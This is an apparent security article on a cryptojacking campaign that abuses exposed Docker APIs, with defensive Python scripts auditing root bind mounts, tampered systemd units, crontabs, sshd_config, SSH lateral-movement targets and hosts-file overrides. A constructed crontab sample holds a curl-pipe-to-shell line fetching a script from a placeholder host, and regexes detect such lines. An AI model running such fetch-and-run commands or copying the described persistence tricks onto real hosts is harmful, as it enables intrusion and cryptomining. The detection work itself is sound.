The Spinning YARN attackers have initiated a fresh cryptojacking campaign, focusing on publicly exposed Docker Engine hosts.
They use a set of new binaries: chkstart for remote access and payload execution, exeremo for lateral movement over SSH, and vurld, a Go downloader that retrieves further malware. For persistence they modify existing systemd services, adding an ExecStartPost= directive so that a malicious command runs every time the service starts.
New techniques to target Docker API
The campaign targets Docker API endpoints exposed without authentication and shares tactics, techniques, and procedures (TTPs) with Spinning YARN, which suggests the same operators. Because the operators reuse file names for updated or replaced payloads, tracking how the campaign evolves requires analysing the payloads themselves rather than relying on their names.
The Spinning YARN malware campaign targets misconfigured Docker, Apache Hadoop, Redis, and Confluence servers. It finds Docker victims by scanning for hosts with TCP port 2375 open (the Docker Engine API's unencrypted, unauthenticated listener, which the daemon only exposes when an administrator configures it to) and uses that API to create an Alpine Linux container. The container is created with the host's root directory bind-mounted into it, so commands run inside the container can read and write the entire host filesystem, which amounts to full control of the host.
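The tell-tale property of the container described above is a bind mount whose host-side source is `/`, and that property is visible both in the `POST /containers/create` request body and in `docker inspect` output (`HostConfig.Binds`, `HostConfig.Mounts` and the top-level `Mounts` array). The following audit script is an added example written for this article, not code from the campaign or from Datadog's analysis; the two container records it runs against are constructed samples, and the list of sensitive host paths is an assumed starting point rather than anything taken from the campaign.

```python
import json
import posixpath
import sys

# Constructed `docker inspect` output (not a capture from the campaign): one
# container of the kind the campaign creates, with the host root bind-mounted
# at /mnt, and one ordinary container that only uses a named volume.
SAMPLE_INSPECT = json.loads("""
[
  {
    "Id": "0123456789abcdef",
    "Name": "/alpine-worker",
    "Config": {"Image": "alpine:latest", "Cmd": ["/bin/sh"]},
    "HostConfig": {"Binds": ["/:/mnt"], "Privileged": false,
                   "PidMode": "", "NetworkMode": "default"},
    "Mounts": [{"Type": "bind", "Source": "/", "Destination": "/mnt", "RW": true}]
  },
  {
    "Id": "fedcba9876543210",
    "Name": "/benign-web",
    "Config": {"Image": "nginx:1.25", "Cmd": ["nginx", "-g", "daemon off;"]},
    "HostConfig": {"Binds": ["webdata:/usr/share/nginx/html"], "Privileged": false,
                   "PidMode": "", "NetworkMode": "default"},
    "Mounts": [{"Type": "volume", "Name": "webdata",
                "Source": "/var/lib/docker/volumes/webdata/_data",
                "Destination": "/usr/share/nginx/html"}]
  }
]
""")

# Assumed list of host paths whose exposure to a container is as good as
# host compromise; extend it for your environment.
SENSITIVE_PREFIXES = ("/etc", "/root", "/home", "/var/run/docker.sock",
                      "/run/docker.sock", "/proc", "/sys", "/boot", "/dev")


def host_paths(container):
    """Host-side sources of bind mounts: HostConfig.Binds and HostConfig.Mounts
    (both present in a create request and in inspect output) plus the Mounts
    array that docker inspect adds."""
    paths = set()
    hc = container.get("HostConfig") or {}
    for bind in hc.get("Binds") or []:
        src = bind.split(":", 1)[0]
        if src.startswith("/"):            # otherwise it names a volume
            paths.add(src)
    for m in list(hc.get("Mounts") or []) + list(container.get("Mounts") or []):
        if m.get("Type") == "bind" and m.get("Source"):
            paths.add(m["Source"])
    return paths


def sensitive_reason(path):
    """Why a host path is dangerous to hand to a container, or None."""
    p = posixpath.normpath(path)
    if p == "/":
        return "entire host root filesystem"
    for pre in SENSITIVE_PREFIXES:
        if p == pre or p.startswith(pre + "/"):
            return f"matches sensitive prefix {pre}"
    return None


def audit_container(container):
    """Findings for one container spec; an empty list means nothing alarming."""
    findings = []
    hc = container.get("HostConfig") or {}
    for p in sorted(host_paths(container)):
        why = sensitive_reason(p)
        if why:
            findings.append(f"bind-mounts host path {p} ({why})")
    if hc.get("Privileged"):
        findings.append("runs privileged")
    if hc.get("PidMode") == "host":
        findings.append("shares the host PID namespace")
    if hc.get("NetworkMode") == "host":
        findings.append("shares the host network namespace")
    return findings


def audit_inspect_output(entries):
    """Map container name (or Id) to findings, omitting clean containers.
    Accepts a docker inspect list or a single create-request body."""
    if isinstance(entries, dict):
        entries = [entries]
    result = {}
    for c in entries:
        f = audit_container(c)
        if f:
            result[c.get("Name") or c.get("Id") or "<unnamed>"] = f
    return result


if __name__ == "__main__":
    # Usage: docker inspect $(docker ps -aq) | python3 docker_mount_audit.py
    data = json.load(sys.stdin) if not sys.stdin.isatty() else SAMPLE_INSPECT
    for name, findings in audit_inspect_output(data).items():
        print(name)
        for f in findings:
            print("  -", f)
```

The same check belongs in front of the daemon, not only behind it: an authorizing proxy or admission policy that rejects `/containers/create` bodies with a `/` bind source stops the technique before the container exists, and a daemon that is only reachable over a TLS-authenticated socket (or not on TCP at all) never sees the request in the first place.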
The attacker establishes persistence by adding cron jobs that fetch and execute malicious shell scripts. Those scripts download additional tools and payloads that disable security tooling, collect information from the host, and ultimately install cryptomining software.
The chkstart malware achieves persistence on an Amazon Linux EC2 instance by altering systemd unit files.
It selects enabled systemd services and appends an ExecStartPost= directive to them, so that a hidden binary named "top" is executed each time the service starts. According to Datadog security researchers, it also edits the SSH daemon configuration so that sshd reads authorized keys from an additional location (the AuthorizedKeysFile directive controls this), then places the attacker's own public key there, giving the attacker persistent SSH access.
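The three persistence mechanisms described so far (cron jobs that fetch and run a script, ExecStartPost= lines injected into enabled units, and extra AuthorizedKeysFile locations in sshd_config) are all plain-text configuration, so they can be hunted with a line-oriented audit. The script below is an added example for this article, not part of the campaign tooling or Datadog's analysis. It generalises slightly beyond the text by checking every Exec*= directive of a unit, not only ExecStartPost=. The sample unit, crontab and sshd_config are constructed; `/var/tmp/.cache/top`, `/etc/ssh/.keys/%u`, the host `198.51.100.7` and the list of commonly imitated tool names are hypothetical choices made to exercise the checks.

```python
import re
import shlex

# Constructed samples, not artefacts from the campaign. The dropped-binary
# path, key location and download host are placeholders chosen to trip the
# checks below (ar.sh is the script name reported for the campaign).
UNIT_TAMPERED = """\
[Unit]
Description=Example daemon

[Service]
Type=simple
ExecStart=/usr/sbin/exampled --foreground
ExecStartPost=/var/tmp/.cache/top

[Install]
WantedBy=multi-user.target
"""
CRONTAB_TAMPERED = """\
MAILTO=root
*/10 * * * * curl -fsSL http://198.51.100.7/ar.sh | sh
0 3 * * * /usr/bin/logrotate /etc/logrotate.conf
"""
SSHD_TAMPERED = """\
Port 22
AuthorizedKeysFile .ssh/authorized_keys /etc/ssh/.keys/%u
PasswordAuthentication no
"""

EXEC_KEYS = ("ExecStartPre", "ExecStart", "ExecStartPost",
             "ExecReload", "ExecStop", "ExecStopPost")
STAGING_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/", "/run/user/")
STANDARD_BIN = ("/bin/", "/sbin/", "/usr/bin/", "/usr/sbin/", "/usr/local/bin/",
                "/usr/local/sbin/", "/usr/lib/", "/usr/libexec/", "/lib/")
# Names the campaign borrows for its binaries ("top", "httpd") plus a few
# other assumed look-alikes; extend as needed.
COMMON_TOOL_NAMES = {"top", "httpd", "ps", "sshd", "crond", "kworker"}
# sshd's defaults; any other AuthorizedKeysFile entry was added by someone.
DEFAULT_KEYFILES = {".ssh/authorized_keys", ".ssh/authorized_keys2",
                    "%h/.ssh/authorized_keys", "%h/.ssh/authorized_keys2"}
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b[^|]*\|\s*(sudo\s+)?(ba|da|z)?sh\b")
FETCH_THEN_RUN = re.compile(
    r"\b(curl|wget)\b.*(;|&&).*(\bchmod\s+(\+x|[0-7]{3,4})|\b(ba|da|z)?sh\b|\./)")


def suspicious_path(path):
    """Reason an executable path looks like a dropped payload, or None."""
    if any(path.startswith(d) for d in STAGING_DIRS):
        return "lives in a world-writable staging directory"
    if any(p.startswith(".") and p not in (".", "..") for p in path.split("/")):
        return "hidden path component"
    if (path.startswith("/") and not path.startswith(STANDARD_BIN)
            and path.rsplit("/", 1)[-1] in COMMON_TOOL_NAMES):
        return "common tool name outside standard binary directories"
    return None


def downloads_and_executes(cmd):
    return bool(PIPE_TO_SHELL.search(cmd) or FETCH_THEN_RUN.search(cmd))


def audit_unit(text, name="unit"):
    """Flag Exec*= lines that run suspicious binaries or fetch-and-run
    one-liners; every ExecStartPost= is listed for review in any case."""
    findings = []
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        key, sep, val = line.partition("=")
        key, cmd = key.strip(), val.strip().lstrip("-@+!:")   # systemd prefixes
        if not sep or key not in EXEC_KEYS or not cmd:
            continue
        try:
            argv = shlex.split(cmd)
        except ValueError:
            argv = cmd.split()
        reason = suspicious_path(argv[0]) if argv else None
        if reason:
            findings.append(f"{name}:{n} {key}= runs {argv[0]} ({reason})")
        elif key == "ExecStartPost":
            findings.append(f"{name}:{n} {key}= present, review: {cmd}")
        if downloads_and_executes(cmd):
            findings.append(f"{name}:{n} {key}= downloads and executes: {cmd}")
    return findings


def audit_crontab(text, name="crontab"):
    """Flag cron entries that download and execute a script."""
    findings = []
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue                        # comment or VAR=value line
        if downloads_and_executes(line):
            findings.append(f"{name}:{n} download-and-execute: {line}")
    return findings


def audit_sshd_config(text, name="sshd_config"):
    """Flag AuthorizedKeysFile locations beyond sshd's defaults."""
    findings = []
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        key, *values = re.split(r"[\s=]+", line)
        if key.lower() != "authorizedkeysfile":
            continue
        for v in values:
            if v not in DEFAULT_KEYFILES:
                note = " (absolute path, shared by every account)" if v.startswith("/") else ""
                findings.append(f"{name}:{n} AuthorizedKeysFile adds {v}{note}")
    return findings


if __name__ == "__main__":
    for f in (audit_unit(UNIT_TAMPERED, "exampled.service")
              + audit_crontab(CRONTAB_TAMPERED) + audit_sshd_config(SSHD_TAMPERED)):
        print(f)
```

Feed it the files a rootkit-free triage would read anyway: the unit files under `/etc/systemd/system` and `/usr/lib/systemd/system` together with any drop-ins, `/etc/crontab`, `/etc/cron.d/*` and each user's crontab, and, for sshd, both `/etc/ssh/sshd_config` (plus `sshd_config.d/*`) and the effective configuration printed by `sshd -T`, which the function also parses because keyword matching is case-insensitive.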
Once in place, the "top" binary, identified as a custom build of the XMRig cryptocurrency miner, consumes the compromised system's CPU to mine cryptocurrency for the attacker.
Exeremo, a malicious Go binary, harvests usernames, hostnames, SSH keys and port numbers from the compromised server's shell history, SSH client configuration and known_hosts files. It uses this data to move laterally, connecting to each discovered SSH server and executing a remote shell script (ar.sh) there.
Exeremo also retrieves and runs a second script (s.sh) that installs scanning tools and deploys a custom Docker discovery utility. s.sh renames the malicious binary sd to httpd, so that it blends in with a common web-server process name, and installs a systemd unit for persistence.
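The sources Exeremo reads are exactly the ones an incident responder should read to estimate the blast radius of a compromised host: every host reachable from known_hosts, every `Host` alias in the SSH client config, and every `ssh`/`scp`/`sftp` destination in shell history. The script below is an added example for this article, not Exeremo or any code from Datadog's analysis; it parses the three formats, resolves history aliases through the client config, and counts the known_hosts entries that hashing has made unrecoverable. The sample files are constructed, with private and documentation-range addresses and placeholder key material.

```python
import re
import shlex

# Constructed samples, not captured from a compromised host.
SAMPLE_KNOWN_HOSTS = """\
10.0.0.5 ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPlaceholderKeyOne
[10.0.0.6]:2222,build.internal ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQPlaceholder
|1|JZ6l0N1jpZb9w6Q=|kY5xM0qH1vN2c8A= ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPlaceholderKeyTwo
"""
SAMPLE_SSH_CONFIG = """\
Host bastion
    HostName 203.0.113.10
    User ops
    Port 2200
    IdentityFile ~/.ssh/id_bastion

Host *
    ServerAliveInterval 60
"""
SAMPLE_HISTORY = """\
ls -la
ssh root@10.0.0.5
ssh -p 2222 deploy@10.0.0.6 'uptime'
ssh bastion
scp -P 2200 backup.tgz ops@203.0.113.10:/tmp/
"""
# ssh/scp/sftp options that consume the following argument.
OPTS_WITH_ARG = {"-p", "-P", "-i", "-l", "-o", "-F", "-J", "-L", "-R", "-D",
                 "-W", "-b", "-c", "-e", "-m", "-S", "-w", "-B", "-E", "-I"}


def parse_known_hosts(text):
    """Return (set of (user, host, port), number of hashed entries)."""
    targets, hashed = set(), 0
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("@"):            # @cert-authority / @revoked marker
            line = line.split(None, 1)[1]
        hostfield = line.split(None, 1)[0]
        if hostfield.startswith("|1|"):     # HashKnownHosts: name not recoverable
            hashed += 1
            continue
        for entry in hostfield.split(","):
            if entry.startswith("["):       # [host]:port form
                host, _, port = entry[1:].partition("]:")
                targets.add((None, host, int(port or 22)))
            else:
                targets.add((None, entry, 22))
    return targets, hashed


def parse_ssh_config(text):
    """Map each concrete Host alias to (user, hostname, port)."""
    aliases, names, opts = {}, [], {}

    def flush():
        for a in names:
            if not any(ch in a for ch in "*?!"):   # skip wildcard blocks
                aliases[a] = (opts.get("user"), opts.get("hostname", a),
                              int(opts.get("port", 22)))

    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        key, *rest = re.split(r"[\s=]+", line, maxsplit=1)
        value = rest[0] if rest else ""
        if key.lower() == "host":
            flush()
            names, opts = value.split(), {}
        elif names:
            opts[key.lower()] = value
    flush()
    return aliases


def parse_history(text):
    """(user, host, port-or-None) for each ssh/scp/sftp command in a history."""
    targets = set()
    for raw in text.splitlines():
        try:
            argv = shlex.split(raw)
        except ValueError:                  # unbalanced quotes in a history line
            continue
        if not argv or argv[0] not in ("ssh", "scp", "sftp"):
            continue
        cmd, user, port, dest, i = argv[0], None, None, None, 1
        while i < len(argv):
            arg = argv[i]
            if arg in OPTS_WITH_ARG and i + 1 < len(argv):
                if arg in ("-p", "-P") and argv[i + 1].isdigit():
                    port = int(argv[i + 1])
                elif arg == "-l":
                    user = argv[i + 1]
                i += 2
            elif arg.startswith("-"):
                i += 1
            elif cmd == "scp" and ":" not in arg:
                i += 1                      # local file operand
            else:
                dest = arg
                break
        if not dest:
            continue
        host = dest.split(":", 1)[0]        # drop the scp remote path
        if "@" in host:
            user, host = host.split("@", 1)
        targets.add((user, host, port))
    return targets


def collect_targets(known_hosts, ssh_config, history):
    """Union of reachable (user, host, port) triples plus hashed-entry count."""
    aliases = parse_ssh_config(ssh_config)
    targets, hashed = parse_known_hosts(known_hosts)
    targets |= set(aliases.values())
    for user, host, port in parse_history(history):
        if host in aliases:
            a_user, a_host, a_port = aliases[host]
            targets.add((user or a_user, a_host, port or a_port))
        else:
            targets.add((user, host, port or 22))
    return targets, hashed


if __name__ == "__main__":
    found, hidden = collect_targets(SAMPLE_KNOWN_HOSTS, SAMPLE_SSH_CONFIG, SAMPLE_HISTORY)
    for user, host, port in sorted(found, key=lambda t: (t[1], t[2], t[0] or "")):
        print(f"{user or '?'}@{host}:{port}")
    print(f"{hidden} hashed known_hosts entries could not be recovered")
```

Two things follow from running this on a real host. First, every listed target must be treated as a candidate for the ar.sh stage and checked for the same persistence artefacts. Second, the hashed-entry count shows how much `HashKnownHosts yes` in the client configuration denies to an attacker who harvests the same file, which makes it a cheap hardening step for any host that holds SSH keys to others.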
The newly discovered payloads, sd/httpd and fkoths, are both Go ELF binaries. sd/httpd scans for exposed Docker Engine hosts and compromises them with the technique described above.
fkoths, for its part, removes the Docker images created during the initial infection and edits the hosts file so that the Docker registry's hostnames no longer resolve, leaving the host unable to pull images. Taken together, these payloads show continued development of the Spinning YARN tooling, but they do not add any fundamentally new capability.
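A hosts-file override is easy to check for directly, and any entry that pins a registry hostname is worth a look, whether it sinkholes the name to a loopback or unspecified address or redirects it elsewhere. The check below is an added example for this article, not code from the campaign or from Datadog's analysis; the sample `/etc/hosts` content is constructed, and the set of Docker Hub hostnames is an assumed starting list that should be extended with any private registries in use.

```python
import ipaddress

# Constructed /etc/hosts content (not from a compromised host). The registry
# lines are the kind of override described for fkoths; 0.0.0.0 and 127.0.0.1
# make the names unreachable.
SAMPLE_HOSTS = """\
127.0.0.1   localhost
::1         localhost ip6-localhost
10.0.0.12   worker-03.internal worker-03

0.0.0.0     registry-1.docker.io
127.0.0.1   index.docker.io auth.docker.io   # added by attacker
"""

# Assumed list of hostnames involved in pulling from Docker Hub; add your
# private registries here.
DOCKER_REGISTRY_HOSTS = {"docker.io", "registry-1.docker.io", "index.docker.io",
                         "auth.docker.io", "production.cloudflare.docker.com"}


def find_registry_overrides(hosts_text, registry_hosts=DOCKER_REGISTRY_HOSTS):
    """Map each registry hostname pinned in a hosts file to the address used
    and whether that address sinkholes the name (loopback or unspecified)."""
    hits = {}
    for raw in hosts_text.splitlines():
        line = raw.split("#", 1)[0].strip()     # drop trailing comments
        if not line:
            continue
        addr, *names = line.split()
        try:
            ip = ipaddress.ip_address(addr)
        except ValueError:
            continue                            # malformed line, skip it
        for name in names:
            if name.lower() in registry_hosts:
                hits[name.lower()] = {"address": addr,
                                      "sinkholed": ip.is_loopback or ip.is_unspecified}
    return hits


if __name__ == "__main__":
    import sys
    # Usage: python3 hosts_audit.py /etc/hosts   (defaults to the sample)
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_HOSTS
    for name, info in find_registry_overrides(text).items():
        verdict = "sinkholed" if info["sinkholed"] else "redirected"
        print(f"{name} -> {info['address']} ({verdict})")
```

On a host where this fires, `docker pull` failures are a symptom rather than a network problem; the remediation is to remove the lines, but the finding itself is evidence of the cleanup stage and should be recorded before anything is changed.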